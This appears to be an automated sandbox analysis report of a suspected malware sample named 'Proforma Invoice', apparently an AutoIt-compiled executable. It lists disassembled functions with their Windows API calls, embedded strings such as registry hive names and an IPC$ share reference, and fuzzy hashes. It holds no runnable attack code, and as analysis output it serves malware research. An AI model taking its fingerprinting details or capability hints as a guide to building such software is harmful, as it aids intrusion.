                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                • String ID: (
                                                                                                • API String ID: 2598888154-3887548279
                                                                                                • Opcode ID: d8c4905785cb66f646b32d4179b1e6228c7fca0c33cd4cadda68871607d54af2
                                                                                                • Instruction ID: 363277380ff3d1f101beda1af65204ae2e8d344e8d658200347d29a442d51c10
                                                                                                • Opcode Fuzzy Hash: d8c4905785cb66f646b32d4179b1e6228c7fca0c33cd4cadda68871607d54af2
                                                                                                • Instruction Fuzzy Hash: B5516A71904349EFCB25CFA8CC84EAEBBB9EF48310F14842DF95A97250C735A841CB54
                                                                                                APIs
                                                                                                  • Part of subcall function 006C0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,006A6B0C,?,00008000), ref: 006C0973
                                                                                                  • Part of subcall function 006A4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006A4743,?,?,006A37AE,?), ref: 006A4770
                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 006A6BAD
                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 006A6CFA
                                                                                                  • Part of subcall function 006A586D: _wcscpy.LIBCMT ref: 006A58A5
                                                                                                  • Part of subcall function 006C363D: _iswctype.LIBCMT ref: 006C3645
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                • API String ID: 537147316-1018226102
                                                                                                • Opcode ID: 990bdd1cdc5c0148c822084cceb1b07e881d3177bf34a8e7566c4b9cc8e275d9
                                                                                                • Instruction ID: fdfc4a12e5d9d7444edb6e681a42835493beed7d98af650446831485f3360f5b
                                                                                                • Opcode Fuzzy Hash: 990bdd1cdc5c0148c822084cceb1b07e881d3177bf34a8e7566c4b9cc8e275d9
                                                                                                • Instruction Fuzzy Hash: 660288705083409FC764FF20C881AAFBBE6AF9A354F04491EF486972A2DB31DD49CB56
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 00702D50
                                                                                                • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00702DDD
                                                                                                • GetMenuItemCount.USER32(00765890), ref: 00702E66
                                                                                                • DeleteMenu.USER32(00765890,00000005,00000000,000000F5,?,?), ref: 00702EF6
                                                                                                • DeleteMenu.USER32(00765890,00000004,00000000), ref: 00702EFE
                                                                                                • DeleteMenu.USER32(00765890,00000006,00000000), ref: 00702F06
                                                                                                • DeleteMenu.USER32(00765890,00000003,00000000), ref: 00702F0E
                                                                                                • GetMenuItemCount.USER32(00765890), ref: 00702F16
                                                                                                • SetMenuItemInfoW.USER32(00765890,00000004,00000000,00000030), ref: 00702F4C
                                                                                                • GetCursorPos.USER32(?), ref: 00702F56
                                                                                                • SetForegroundWindow.USER32(00000000), ref: 00702F5F
                                                                                                • TrackPopupMenuEx.USER32(00765890,00000000,?,00000000,00000000,00000000), ref: 00702F72
                                                                                                • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00702F7E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                • String ID:
                                                                                                • API String ID: 3993528054-0
                                                                                                • Opcode ID: c1df41ab55e33f547ccf7a1f88170142a3dc24943c2ef266b99a716a884c9718
                                                                                                • Instruction ID: b7d16bf9c12fbd73cd9d45e90cef684a8b478faa41f16487cab56749e2051325
                                                                                                • Opcode Fuzzy Hash: c1df41ab55e33f547ccf7a1f88170142a3dc24943c2ef266b99a716a884c9718
                                                                                                • Instruction Fuzzy Hash: 3F71D372640205FAEB218F54DC8DFAABFA4FF04754F104326F615A61E2C7B96C22D794
                                                                                                APIs
                                                                                                • VariantInit.OLEAUT32(?), ref: 007188D7
                                                                                                • CoInitialize.OLE32(00000000), ref: 00718904
                                                                                                • CoUninitialize.OLE32 ref: 0071890E
                                                                                                • GetRunningObjectTable.OLE32(00000000,?), ref: 00718A0E
                                                                                                • SetErrorMode.KERNEL32(00000001,00000029), ref: 00718B3B
                                                                                                • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00732C0C), ref: 00718B6F
                                                                                                • CoGetObject.OLE32(?,00000000,00732C0C,?), ref: 00718B92
                                                                                                • SetErrorMode.KERNEL32(00000000), ref: 00718BA5
                                                                                                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00718C25
                                                                                                • VariantClear.OLEAUT32(?), ref: 00718C35
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                • String ID: ,,s
                                                                                                • API String ID: 2395222682-1043017150
                                                                                                • Opcode ID: 901b7f45bcb2fa524e1bbed7bc656d038f964692679c726bfdb6b4527222b6e2
                                                                                                • Instruction ID: 48c8101cf247764b9327b816e6f46568353009a95c162eee5476a3c5ecc6cef7
                                                                                                • Opcode Fuzzy Hash: 901b7f45bcb2fa524e1bbed7bc656d038f964692679c726bfdb6b4527222b6e2
                                                                                                • Instruction Fuzzy Hash: 06C158B12083059FC740DF28C88496BB7E9FF89748F00496DF9899B291DB75ED46CB62
                                                                                                APIs
                                                                                                  • Part of subcall function 006A7BCC: _memmove.LIBCMT ref: 006A7C06
                                                                                                • _memset.LIBCMT ref: 006F786B
                                                                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 006F78A0
                                                                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 006F78BC
                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 006F78D8
                                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 006F7902
                                                                                                • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 006F792A
                                                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 006F7935
                                                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 006F793A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                • API String ID: 1411258926-22481851
                                                                                                • Opcode ID: 6fe144f2e9096ba9c0bbff610e736a78758064edcc73c9b9261a3356269b75c9
                                                                                                • Instruction ID: 6bff47da38c8f4f158af5daeede384a6f80f91a6d8a5e7be692a5149ce357cc6
                                                                                                • Opcode Fuzzy Hash: 6fe144f2e9096ba9c0bbff610e736a78758064edcc73c9b9261a3356269b75c9
                                                                                                • Instruction Fuzzy Hash: 4D411972C1422DABCB25EBA4EC45DEEB77AFF08350F404429E916A3261EA745E05CF94
                                                                                                APIs
                                                                                                • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0071FDAD,?,?), ref: 00720E31
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: BuffCharUpper
                                                                                                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                • API String ID: 3964851224-909552448
                                                                                                • Opcode ID: 63181b4f3bd35bae8481026c3d183f66c133c28f641c4c4fd5b4daac958ecbf9
                                                                                                • Instruction ID: 8e02a9fa83129b1d6f485196b604828f831688e5349ccd4261d2b413654beb44
                                                                                                • Opcode Fuzzy Hash: 63181b4f3bd35bae8481026c3d183f66c133c28f641c4c4fd5b4daac958ecbf9
                                                                                                • Instruction Fuzzy Hash: 9B41463214429ACBDF50EE50E955AEF3765EF11300F150428FC651B293DB789D2ACBE0
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,006DE2A0,00000010,?,Bad directive syntax error,0072F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 006FF7C2
                                                                                                • LoadStringW.USER32(00000000,?,006DE2A0,00000010), ref: 006FF7C9
                                                                                                  • Part of subcall function 006A7DE1: _memmove.LIBCMT ref: 006A7E22
                                                                                                • _wprintf.LIBCMT ref: 006FF7FC
                                                                                                • __swprintf.LIBCMT ref: 006FF81E
                                                                                                • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 006FF88D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                • API String ID: 1506413516-4153970271
                                                                                                • Opcode ID: ed0bf174d8dcf86a4f09f9b5b41aed5b17450b917187e81b7d9f22926335e801
                                                                                                • Instruction ID: 56ae7a1951b28a16bba86166d2ace77ed4208395db80426f9d837b86e8a01c17
                                                                                                • Opcode Fuzzy Hash: ed0bf174d8dcf86a4f09f9b5b41aed5b17450b917187e81b7d9f22926335e801
                                                                                                • Instruction Fuzzy Hash: 39218E3180021DAFCF51EF90CC0AEFE773AFF18300F04446AF516661A2DA759A18CB55
                                                                                                APIs
                                                                                                  • Part of subcall function 006A7BCC: _memmove.LIBCMT ref: 006A7C06
                                                                                                  • Part of subcall function 006A7924: _memmove.LIBCMT ref: 006A79AD
                                                                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00705330
                                                                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00705346
                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00705357
                                                                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00705369
                                                                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0070537A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: SendString$_memmove
                                                                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                • API String ID: 2279737902-1007645807
                                                                                                • Opcode ID: 2e36061b2143ee6e9c5bb86c502a1da1b3ab0f9a6083783ef13cfaf54984d444
                                                                                                • Instruction ID: 967ee6f5c62993af97d6f9fe5d872d9ff84445190f9e90a876d3f5e42bd545c1
                                                                                                • Opcode Fuzzy Hash: 2e36061b2143ee6e9c5bb86c502a1da1b3ab0f9a6083783ef13cfaf54984d444
                                                                                                • Instruction Fuzzy Hash: 6911B67195015D7AD7A0F6A1CC49DFFBBBCEB96B45F400429B802A20D1DEE41D09CDA5
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                • String ID: 0.0.0.0
                                                                                                • API String ID: 208665112-3771769585
                                                                                                • Opcode ID: 80eedc5577ccc798c93312197a3e6fdad86e49a599b956601638f0da2b22e827
                                                                                                • Instruction ID: c70c1faa8363249be467be8af5ad759d3ec74ce62c178e4359f1df4e83e75c0a
                                                                                                • Opcode Fuzzy Hash: 80eedc5577ccc798c93312197a3e6fdad86e49a599b956601638f0da2b22e827
                                                                                                • Instruction Fuzzy Hash: 0F110271500114EFDB24AB70AC4AFEA77BCEF02711F0052BEF545920A1EF789A828A54
                                                                                                APIs
                                                                                                • timeGetTime.WINMM ref: 00704F7A
                                                                                                  • Part of subcall function 006C049F: timeGetTime.WINMM(?,75C0B400,006B0E7B), ref: 006C04A3
                                                                                                • Sleep.KERNEL32(0000000A), ref: 00704FA6
                                                                                                • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00704FCA
                                                                                                • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00704FEC
                                                                                                • SetActiveWindow.USER32 ref: 0070500B
                                                                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00705019
                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00705038
                                                                                                • Sleep.KERNEL32(000000FA), ref: 00705043
                                                                                                • IsWindow.USER32 ref: 0070504F
                                                                                                • EndDialog.USER32(00000000), ref: 00705060
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                • String ID: BUTTON
                                                                                                • API String ID: 1194449130-3405671355
                                                                                                • Opcode ID: 0b2657a41fc110eacb0ef6b23d5c2a5de826c606db3665a9f570ba5673395127
                                                                                                • Instruction ID: 7431d9aa9bf0c71a7a7d04abfa0168e1ec5d4a7e96a23f417ec30b1ea6d805a9
                                                                                                • Opcode Fuzzy Hash: 0b2657a41fc110eacb0ef6b23d5c2a5de826c606db3665a9f570ba5673395127
                                                                                                • Instruction Fuzzy Hash: 992192B0200705EFE7215F30EC89E2A7BA9EB09749F489134F503811F2DBAE5D619A69
                                                                                                APIs
                                                                                                  • Part of subcall function 006A9837: __itow.LIBCMT ref: 006A9862
                                                                                                  • Part of subcall function 006A9837: __swprintf.LIBCMT ref: 006A98AC
                                                                                                • CoInitialize.OLE32(00000000), ref: 0070D5EA
                                                                                                • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0070D67D
                                                                                                • SHGetDesktopFolder.SHELL32(?), ref: 0070D691
                                                                                                • CoCreateInstance.OLE32(00732D7C,00000000,00000001,00758C1C,?), ref: 0070D6DD
                                                                                                • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0070D74C
                                                                                                • CoTaskMemFree.OLE32(?,?), ref: 0070D7A4
                                                                                                • _memset.LIBCMT ref: 0070D7E1
                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 0070D81D
                                                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0070D840
                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 0070D847
                                                                                                • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0070D87E
                                                                                                • CoUninitialize.OLE32(00000001,00000000), ref: 0070D880
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                • String ID:
                                                                                                • API String ID: 1246142700-0
                                                                                                • Opcode ID: 39cf1db3227ba5fab4c2ed8d305af0b1530f2c3e5cc34937f7ddb97ced9a0b66
                                                                                                • Instruction ID: 0ee2ff5781ab74d8e5a9bf9112f8fbc433bc285d6d21d7026ba11da0fb6142e8
                                                                                                • Opcode Fuzzy Hash: 39cf1db3227ba5fab4c2ed8d305af0b1530f2c3e5cc34937f7ddb97ced9a0b66
                                                                                                • Instruction Fuzzy Hash: CDB12975A00209EFDB14DFA4C888DAEBBF9EF49310F108169E909EB261DB34ED41CB54
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,00000001), ref: 006FC283
                                                                                                • GetWindowRect.USER32(00000000,?), ref: 006FC295
                                                                                                • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 006FC2F3
                                                                                                • GetDlgItem.USER32(?,00000002), ref: 006FC2FE
                                                                                                • GetWindowRect.USER32(00000000,?), ref: 006FC310
                                                                                                • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 006FC364
                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 006FC372
                                                                                                • GetWindowRect.USER32(00000000,?), ref: 006FC383
                                                                                                • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 006FC3C6
                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 006FC3D4
                                                                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 006FC3F1
                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 006FC3FE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$ItemMoveRect$Invalidate
                                                                                                • String ID:
                                                                                                • API String ID: 3096461208-0
                                                                                                • Opcode ID: 10310d98e0b7c2a670ff2af63e5d027c47c5849fabe4ea1c5d10db2a7a5ca5ab
                                                                                                • Instruction ID: 30cf0f1bafec03cd1c9e945474357769352f3140b8a65687db301dd493ca4236
                                                                                                • Opcode Fuzzy Hash: 10310d98e0b7c2a670ff2af63e5d027c47c5849fabe4ea1c5d10db2a7a5ca5ab
                                                                                                • Instruction Fuzzy Hash: C6513C71B00209AFDB18CFA9DD99AAEBBBAEB88710F14813DF615D7390D7709D018B14
                                                                                                APIs
                                                                                                  • Part of subcall function 006A1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,006A2036,?,00000000,?,?,?,?,006A16CB,00000000,?), ref: 006A1B9A
                                                                                                • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 006A20D3
                                                                                                • KillTimer.USER32(-00000001,?,?,?,?,006A16CB,00000000,?,?,006A1AE2,?,?), ref: 006A216E
                                                                                                • DestroyAcceleratorTable.USER32(00000000), ref: 006DBCA6
                                                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006A16CB,00000000,?,?,006A1AE2,?,?), ref: 006DBCD7
                                                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006A16CB,00000000,?,?,006A1AE2,?,?), ref: 006DBCEE
                                                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006A16CB,00000000,?,?,006A1AE2,?,?), ref: 006DBD0A
                                                                                                • DeleteObject.GDI32(00000000), ref: 006DBD1C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                • String ID:
                                                                                                • API String ID: 641708696-0
                                                                                                • Opcode ID: be88c43fefcfc9dfb4106830a268d22f10b5078afb57407ce75826ce5dd85d40
                                                                                                • Instruction ID: ed47cc102980cb009983b2a2736ff5af6ce0fe371a2a67e0518c36b05e2bac45
                                                                                                • Opcode Fuzzy Hash: be88c43fefcfc9dfb4106830a268d22f10b5078afb57407ce75826ce5dd85d40
                                                                                                • Instruction Fuzzy Hash: 62616930540A02DFCB35AF18D958B69B7F3FF41312F508529E5424BA64C7B8AC91EF98
                                                                                                APIs
                                                                                                  • Part of subcall function 006A25DB: GetWindowLongW.USER32(?,000000EB), ref: 006A25EC
                                                                                                • GetSysColor.USER32(0000000F), ref: 006A21D3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
